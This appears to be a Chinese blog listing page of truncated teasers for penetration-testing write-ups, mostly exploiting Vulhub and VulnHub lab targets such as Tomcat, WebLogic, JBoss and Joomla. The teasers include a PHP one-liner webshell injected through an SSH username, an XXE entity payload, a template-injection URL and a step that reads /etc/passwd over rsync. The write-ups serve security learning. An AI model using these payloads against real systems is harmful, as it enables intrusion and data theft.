• 2025-01-03常见中间件漏洞(tomcat,weblogic,jboss,apache)
    先准备好今天要使用的木马文件使用哥斯拉生成木马压缩成zip文件改名为war后缀一:Tomcat1.1CVE-2017-12615环境搭建cdvulhub-master/tomcat/CVE-2017-12615docker-composeup-d1.首页抓包,修改为PUT方式提交发送shell.jsp和木马内容201创建成功2.
  • 2024-12-30vulhub靶场DriftingBlues实战
    kali虚拟机扫描端口访问网址扫描靶机目录访问robots.txt访问/textpattern/textpattern,进入一个登录界面在kali使用ffuf进行爆破,得到一个压缩包下载压缩包,爆破得到账号和密码登录到网站,传入一句话木马文件上传成功访问一句话木马使用蚁剑测试连接
  • 2024-12-10WebLogic T3反序列化漏洞(CVE-2018-2628)--vulhub
    WebLogicT3反序列化漏洞(CVE-2018-2628)WebLogic在通信过程中使用T3协议传输数据,涉及到了序列化和反序列化操作。T3协议概述T3协议是Oracle的私有协议,所以公开的相关资料比较少,这里结合其他师傅的博客简单对T3协议进行一个简要分析。T3协议是WebLogic的一种专有通信协
  • 2024-12-13vue使用百度富文本编辑器
     1、安装 npm addvue-ueditor-wrap  或者  pnpmaddvue-ueditor-wrap 进行安装 2、下载UEditor 官网:ueditor:richtext富文本编辑器-GitCode整理好的:vue-ueditor:百度编辑器JSP版因为官方的我没用来,所以我自己找的另外的包3、把下载好的包放在项目
  • 2024-10-16Vulhub Bob: 1.0.1靶机详解
    项目地址https://download.vulnhub.com/bob/Bob_v1.0.1.ova实验过程开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254根据对比可知Bob:1.0.1的一个ip地址为192.168.47.173扫描Bob:1.0.1的操作系统,端口及对应服务nmap-A-p-192.168.
  • 2024-09-22Jboss CVE-2017-12149 靶场攻略
    漏洞简述该漏洞为Java反序列化错误类型,存在于Jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导致了漏洞漏洞范围JBoss5.x/6.x环境搭建cdvulhub-master/jboss/CVE-20
  • 2024-09-08vulhub spring 远程命令执行漏洞(CVE-2016-4977)
    步骤一:执行以下命令启动靶场环境并在浏览器访问cd/vulhub/spring/CVE-2016-4977#进入漏洞环境所在目录docker-compose up-d#启动靶场 docker ps#查看容器信息步骤二:访问环境步骤三:192.168.0.107:8080/oauth/authorize?response_type=${2*2}&client_id=acme&scope=o
  • 2024-08-29vulhub xxe靶机
    步骤一:搜索靶机地址步骤二:利用dirsearsh扫描目录步骤三:进入靶机进入robots.txt步骤四:访问/xxe步骤五:输入用户名密码,利用burp抓包,传送至重放器输入:<?xmlversion="1.0"encoding="UTF-8"?><!DOCTYPEr[<!ELEMENTrANY><!ENTITYadminSYSTEM"php://filter/r
  • 2024-08-08kali搭建Vulhub漏洞靶场
    Vulhub是一个基于Docker和Docker-compose的漏洞靶场环境,它提供了多种常见的漏洞环境,可以帮助开发人员和安全研究者学习和测试安全漏洞。Vulhub需要Docker环境来运行,所以首先确保你的系统中安装了Docker。Docker的安装方法可以在其官方网站找到。或者按照以下步骤完成Docker环境的
  • 2024-08-06【vulhub靶场之rsync关】
    一、使用nmap模块查看该ip地址有没有Rsync未授权访问漏洞nmap-p873--scriptrsync-list-modules加IP地址查看到是有漏洞的模块的二、使用rsync命令连接并读取文件查看src目录里面的信息。三、对系统中的敏感文件进行下载——/etc/passwd执行命令:rsyncrsync:/
  • 2024-08-04Jupyter NoteBook未授权访问漏洞
    JupyterNotebook(此前被称为IPythonnotebook)是一个交互式笔记本,支持运行40多种编程语言。如果管理员未为JupyterNotebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令,默认端口:8888步骤一:通过以下fofa语法进行产品搜索..或使用
  • 2024-08-02反序列化漏洞vulhub靶场serial
    环境搭建下载https://download.vulnhub.com/serial/serial.zip解压出来就是这种 你会得到一个这样的文件,这里使用VMware新建一个虚拟机,这里记录比较重要的几部分。这里就是使用我们刚才下过来的。  漏洞过程详解1.信息收集打开靶机,在kali虚拟机中进行主机
  • 2024-07-24Ubuntu搭建Vulhub靶场
    Step1首先安装docker和docker-compose,参考其他教程安装完成后查看当前版本判断是否安装成功Step21.安装vulhub靶场选择一个合适的位置执行如下代码(我放在/root/vulhub),进行克隆下载gitclonehttps://gitee.com/puier/vulhub.git下载成功2.编译并运行靶场随便选择
  • 2024-06-20通过 HIDS 告警分析 webshell 行为
    准备漏洞环境1. 下载 vulhub 仓库gitclonehttps://github.com/vulhub/vulhub.git2.  修改 tomcat 弱口令漏洞环境配置vivulhub/tomcat/tomcat8/tomcat-users.xml将配置文件中的 user 和 password 修改为非弱口令3.  启动漏洞环境(根据实际 docker 环境
  • 2024-06-13Vulhub WebLogic漏洞复现
    目录前言任意文件上传漏洞(CVE-2018-2894)管理控制台未授权RCE漏洞(CVE-2020-14882&CVE-2020-14883)未授权RCE漏洞(CVE-2023-21839)SSRF漏洞(CVE-2014-4210)前言前面两篇针对WebLogic存在的XMLDecoder和T3协议反序列化漏洞进行了分析和复现,这里继续借助vulhub来复现WebLogic的其他漏洞
  • 2024-06-13vulhub - INFOSEC PREP: OSCP
    vulhub-INFOSECPREP:OSCP信息收集nmap192.168.157.0/24nmap-sT--min-rate10000-p-192.168.157.162sudonmap-sT-sV-sC-O-p22,80,33060192.168.157.162ssh登录明显看到web页面有./secret.txt文件web首页提到了唯一用户oscp私钥登录失败因为我的
  • 2024-05-31vulhub-素晴主题靶机aqua详细渗透流程
    文章目录靶机信息一、锁定靶机地址二、扫描靶机端口与服务三、SMB信息搜集四、WEB渗透1.网站目录扫描2.网页信息搜集3.文件包含漏洞五、FTP服务渗透1.knockd技术2.knock开启端口3.FTP上传反弹shell获取webshell六、后渗透提权1.webshell到普通用户2.普通用户横向提权3.
  • 2024-05-29vulhub-driftingblues3
    发现/robots.txt->/eventadmins/->/littlequeenofspades.html->/adminsfixit.php界面包含ssh日志,通过尝试发现ssh连接后会更新日志,使用php一句话木马ssh -l'<?phpsystem($_GET[\"cmd\"]);?>' 192.168.56.111在kali下运行此命令出现错误:~>>ssh-l�
  • 2024-05-13靶场合集
    1.vulnhub很多安全竞赛都有在这里面出题,系列非常之多,不仅仅有web方面的,也有系统方面的渗透。网上也有很多writeup,环境直接下载虚拟机压缩包,解压即可使用。新手朋友建议下载先自行测试,然后再看writeup解题https://vulhub.org/(在线版)https://github.com/vulhub/vulhub(离线版)2.
  • 2024-04-10记录很久没用Ubuntu遇到的问题,并安装vulhub漏洞环境(Docker已装好)
    前景提要:之前有装过vulhub,但是今天想复现一下shiro反序列化漏洞(CVE-2016-4437),查看我下载的vulhub,没有找到。就打算更新(顺便提一嘴,更新命令为:gitpull,要先关闭docker),但是我一更新就VMware就弹出“对文件“……\VirtualMachines\Ubuntu64位\Ubuntu64位-000001.vmdk”的操作失
  • 2024-04-04vulhub中Apache Solr 远程命令执行漏洞复现(CVE-2019-0193)
    ApacheSolr是一个开源的搜索服务器。Solr使用Java语言开发,主要基于HTTP和ApacheLucene实现。此次漏洞出现在ApacheSolr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataC
  • 2024-03-20Kali学习笔记07-部署vulhub靶机
    Kali学习笔记07-部署vulhub靶机KaliLinux网络安防一、下载vulhub从vulhub的github网站vulhub/vulhub上下载它的压缩包,得到一个叫做vulhub-master.zip的压缩包。二、解压缩unzipvulhub-master.zip三、进入到某一个漏洞目录中enterdescriptionhere四、自
  • 2024-03-18Joomla SQL注入漏洞(CVE-2017-8917)
    环境搭建参考vulhub中文文档:https://github.com/vulhub/vulhub/blob/master/joomla/CVE-2017-8917/README.zh-cn.md安装vulhub,然后cdvulhub/joomla/CVE-2017-8917dockercomposeup-d如果报端口冲突的错可以修改文件:docker-compose.yml中的端口此时能访问http://